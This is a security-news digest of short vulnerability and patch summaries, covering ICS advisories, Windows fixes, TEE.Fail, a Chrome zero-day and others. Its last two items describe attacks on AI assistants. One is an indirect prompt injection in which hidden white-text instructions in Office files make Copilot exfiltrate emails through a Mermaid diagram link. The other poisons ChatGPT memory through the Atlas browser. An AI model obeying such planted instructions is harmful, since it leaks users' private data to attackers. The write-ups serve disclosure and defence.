All news in category "Security Advisory and Patch Watch"

CISA Releases Two ICS Advisories on ISO 15118-2 and TropOS

🛡️ CISA released two Industrial Control Systems advisories addressing the International Standards Organization ISO 15118-2 standard and Hitachi Energy TropOS. The advisories provide timely information on security issues, vulnerabilities, and potential exploits affecting ICS components. Administrators and operators are urged to review the advisories for technical details and recommended mitigations to protect operational environments.

ISO 15118-2 SLAC Vulnerability in EV Charging Protocol

🔒 ISO 15118-2-compliant EV charging implementations using the SLAC protocol are vulnerable to spoofed measurements that can enable man‑in‑the‑middle attacks between vehicles and chargers, tracked as CVE-2025-12357 (CVSS v4 7.2). The issue is an improper restriction of communication channel (CWE-923) and may be exploitable wirelessly at close range via electromagnetic induction. ISO recommends using TLS (required in ISO 15118-20) with certificate chaining; CISA advises minimizing network exposure, isolating control networks, and using secure remote access methods.

Hitachi Energy TropOS Command Injection and Privilege Issues

⚠️ Hitachi Energy's TropOS wireless devices contain multiple vulnerabilities — including OS command injection and improper privilege management — that can be exploited remotely by authenticated users to obtain root access. Affected 4th Gen firmware versions up to 8.9.6.0 are vulnerable (CVE-2025-1036, CVE-2025-1037, CVE-2025-1038); CVSS v4 scores reach 8.7. Hitachi Energy advises immediate update to version 8.9.7.0, and CISA recommends isolating devices, minimizing network exposure, and following ICS security best practices.

Plugin Flaw Lets Subscribers Read Any Server File Now

⚠️ The Anti-Malware Security and Brute-Force Firewall WordPress plugin (versions up to 4.23.81) contains a vulnerability (CVE-2025-11705) that allows low-privileged subscribers to read arbitrary files on the server. The issue is caused by missing capability checks in the GOTMLS_ajax_scan() AJAX handler, enabling attackers who can obtain a nonce to access sensitive files like wp-config.php. The developer released v4.23.83 on October 15, which adds a proper capability check via a new GOTMLS_kill_invalid_user() function; administrators of membership sites should update immediately.

Microsoft fixes Media Creation Tool on affected PCs again

🛠 Microsoft has restored the Windows 11 Media Creation Tool after reports it failed to run on some up-to-date Windows 10 22H2, Windows 11 25H2 and Arm64 systems following the Windows 11 2025 Update. Microsoft says the issue was resolved in the optional KB5067036 preview update published October 28, 2025, and the updated tool is now available for download. As before, users can also obtain Windows ISO files directly to create bootable media.

Microsoft fixes 0x800F081F Windows Update failures

🔧 Microsoft has resolved a known issue that caused Windows updates to fail with error code 0x800F081F on Windows 11 24H2 devices. The problem affected systems that installed the KB5050094 January 2025 preview cumulative update and subsequent updates, and Microsoft traced the failures to missing language packs and feature payloads removed by ACR/MCR cleanup. Microsoft acknowledged the issue on October 15 and fixed it in the KB5067036 October 2025 preview update. Administrators who cannot install the optional preview immediately can perform an In‑Place Upgrade via Windows installation media or the Settings > System > Recovery workflow to restore missing components without losing files or apps.

BSI: Tens of Thousands of German Exchange Servers Vulnerable

⚠️ The German Federal Office for Information Security (BSI) warns that the majority of an estimated 33,000 publicly reachable Microsoft Exchange Server 2016 and 2019 installations still operate without vendor support after 14 October 2025. Without security updates, new critical Exchange vulnerabilities cannot be patched and affected systems may need to be taken offline to avoid compromise. The BSI highlights rapid network-wide compromise and ransomware risk and urges prompt upgrades, migrations, or protective measures such as VPNs or IP restrictions.

Defending QUIC Against Acknowledgement-Based DDoS Attacks

🔒 Cloudflare patched two QUIC ACK-handling vulnerabilities (CVE-2025-4820, CVE-2025-4821) affecting its open-source quiche library and services using it. The flaws—missing ACK range validation and an Optimistic ACK attack—could let a malicious peer inflate server send rates, driving CPU and network amplification. Cloudflare implemented ACK range enforcement and a dynamic, CWND-aware skip frequency; quiche versions prior to 0.24.4 were affected.

Active Exploits Target DELMIA Apriso and XWiki — CISA

⚠️ CISA and researchers report active exploitation of critical vulnerabilities in Dassault Systèmes DELMIA Apriso and XWiki, including code injection, missing authorization, and eval injection flaws. Dassault addressed CVE-2025-6204 and CVE-2025-6205 for 2020–2025 releases in August and these issues were added to CISA’s Known Exploited Vulnerabilities catalog. The XWiki flaw (CVE-2025-24893) is being abused in a two-stage chain that stages and later executes a downloader to deliver a cryptocurrency miner. Organizations should apply vendor updates immediately and meet federal remediation deadlines where applicable.

Windows 11 KB5067036 Preview Adds Administrator Protection

🔒 Microsoft has released the KB5067036 preview cumulative update for Windows 11 24H2 and 25H2, introducing the new Administrator Protection feature alongside a refreshed Start menu. Administrator Protection requires users to verify identity with Windows Hello before permitting actions that require administrative privileges; it is off by default and can be enabled via OMA-URI in Microsoft Intune or Group Policy. The preview also delivers File Explorer and UI enhancements plus a range of bug fixes across authentication, graphics, accessibility and Windows Update reliability. Microsoft reports no known issues with this update.

TEE.Fail: DDR5 physical interposition exposes CPU TEE keys

🔓 A team of researchers from Georgia Tech, Purdue University and security firm Synkhronix disclosed TEE.Fail, a side‑channel that inspects DDR5 memory traffic to extract secrets from processor TEEs. Using an inexpensive interposition device built from off‑the‑shelf parts for under $1,000, the technique can recover attestation and signing keys from Intel SGX/TDX and AMD SEV‑SNP with Ciphertext Hiding, and can be used to undermine GPU confidential computing. Vendors assert that physical bus attacks remain out of scope.

CISA Warns of Two Actively Exploited DELMIA Flaws Now

⚠️ CISA has confirmed active exploitation of two vulnerabilities in Dassault Systèmes' DELMIA Apriso: CVE-2025-6205 (critical missing authorization) and CVE-2025-6204 (high-severity code injection). Both flaws were patched by the vendor in early August 2025 and affect Releases 2020 through 2025. Federal agencies must remediate within three weeks under BOD 22-01, and CISA urges all organizations to prioritize vendor mitigations or discontinue use if no fixes exist.

TEE.Fail breaks confidential computing on DDR5 CPUs

🔓 Academic researchers disclosed TEE.Fail, a DDR5 memory-bus interposition side-channel that can extract secrets from Trusted Execution Environments such as Intel SGX, Intel TDX, and AMD SEV-SNP. By inserting an inexpensive interposer between a DDR5 DIMM and the motherboard and recording command/address and data bursts, attackers can map deterministic AES-XTS ciphertexts to plaintext values and recover signing and cryptographic keys. The method requires physical access and kernel privileges but can be implemented for under $1,000; Intel, AMD and NVIDIA were notified and are developing mitigations.

Chrome zero-day exploited in targeted Operation ForumTroll

🔒 A critical Chrome zero-day (CVE-2025-2783) has been actively exploited in a targeted espionage operation Kaspersky calls "Operation ForumTroll," attributed to the threat actor Mem3nt0 mori. Attackers used highly personalized phishing invites and one-click, short-lived links to deliver a sandbox-escape exploit that enabled code execution in Chrome's browser process. Google moved quickly with fixes in Chrome 134.0.6998.177/.178, while related issues were later patched in Firefox as CVE-2025-2857.

Schneider Electric EcoStruxure OPC UA Server DoS Advisory

🔒 CISA and Schneider Electric describe a vulnerability (CVE-2024-10085) in EcoStruxure that allows remote actors to exhaust server resources and cause denial of service by sending a large number of OPC UA requests to the server. Affected products include EcoStruxure OPC UA Server Expert versions prior to SV2.01 SP3 and EcoStruxure Modicon Communication Server (all versions). The issue has a CVSS v4 base score of 8.2 and is noted as remotely exploitable with low attack complexity. Schneider has released SV2.01 SP3 to address the OPC UA Server Expert and plans remediation for Modicon; interim mitigations and hardening guidance are provided.

CISA Adds Two Dassault DELMIA Apriso Vulnerabilities

🔒 CISA added two vulnerabilities to its Known Exploited Vulnerabilities Catalog affecting Dassault Systèmes DELMIA Apriso. The issues—CVE-2025-6204 (code injection) and CVE-2025-6205 (missing authorization)—have evidence of active exploitation and pose significant risk. Under BOD 22-01, Federal Civilian Executive Branch agencies must remediate KEV-listed CVEs by the required due dates. CISA strongly urges all organizations to prioritize timely remediation as part of routine vulnerability management.

CISA Releases Three ICS Advisories on Schneider, Vertikal

🔔 CISA released three Industrial Control Systems (ICS) advisories addressing multiple vulnerabilities that may affect operational technology safety and availability. The advisories cover ICSA-25-301-01 Schneider Electric EcoStruxure, ICSMA-25-301-01 Vertikal Systems Hospital Manager Backend Services, and an update to ICSA-24-352-04 Schneider Electric Modicon (Update B). Administrators and asset owners should review the technical findings, assess exposure, and apply recommended mitigations promptly to reduce operational risk.

Vertikal Systems Hospital Manager Backend Services

⚠️ CISA disclosed critical vulnerabilities in Vertikal Systems Hospital Manager Backend Services that were fixed as of September 19, 2025. One flaw exposed the unauthenticated ASP.NET tracing endpoint (/trace.axd), allowing disclosure of request traces, headers, session identifiers, and internal paths. A second flaw returned verbose ASP.NET error pages for invalid WebResource.axd requests, revealing framework versions, stack traces, and server paths. CVE-2025-54459 and CVE-2025-61959 were assigned; organizations should apply vendor updates and follow network isolation best practices.

Copilot Mermaid Diagrams Could Exfiltrate Enterprise Emails

🔐 Microsoft has patched an indirect prompt injection vulnerability in Microsoft 365 Copilot that could have been exploited to exfiltrate recent enterprise emails via clickable Mermaid diagrams. Researcher Adam Logue demonstrated a multi-stage attack using Office documents containing hidden white-text instructions that caused Copilot to invoke an internal search-enterprise_emails tool. The assistant encoded retrieved emails into hex, embedded them in Mermaid output styled as a login button, and added an attacker-controlled hyperlink. Microsoft mitigated the risk by disabling interactive hyperlinks in Mermaid diagrams within Copilot chats.

Atlas Browser Flaw Lets Attackers Poison ChatGPT Memory

⚠️ Researchers at LayerX Security disclosed a vulnerability in OpenAI’s Atlas browser that allows attackers to inject hidden instructions into a user’s ChatGPT memory via a CSRF-style flow. An attacker lures a logged-in user to a malicious page, leverages existing authentication, and taints the account-level memory so subsequent prompts can trigger malicious behavior. LayerX reported the issue to OpenAI and advised enterprises to restrict Atlas use and monitor AI-driven anomalies. Detection relies on behavioral indicators rather than traditional malware artifacts.